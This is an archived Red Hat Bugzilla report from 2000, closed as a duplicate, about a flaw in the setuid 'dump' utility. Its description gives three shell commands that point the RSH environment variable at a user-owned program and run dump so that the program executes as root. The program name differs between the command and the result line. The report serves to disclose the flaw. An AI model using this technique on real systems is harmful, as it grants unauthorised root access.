Bug 20565 - dumb error(get root UID)
dumb error(get root UID)
Status: CLOSED DUPLICATE of bug 20111
Product: Red Hat Linux
Classification: Retired
Component: dump (Show other bugs)
6.2
i386 Linux
medium Severity medium
: ---
: ---
Assigned To: Nalin Dahyabhai
Dale Lovelace
:
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2000-11-09 04:33 EST by Need Real Name
Modified: 2007-04-18 12:29 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2000-11-09 04:33:43 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Need Real Name 2000-11-09 04:33:41 EST
bash$ export TAPE=garbage:garbage
bash$ export RSH=/home/user/proga
bash$ /sbin/dump -0 /

and /home/user/progo execute with root privilege.
Comment 1 Jeff Johnson 2000-11-09 08:15:21 EST

*** This bug has been marked as a duplicate of 20111 ***

Note You need to log in before you can comment on or make changes to this bug.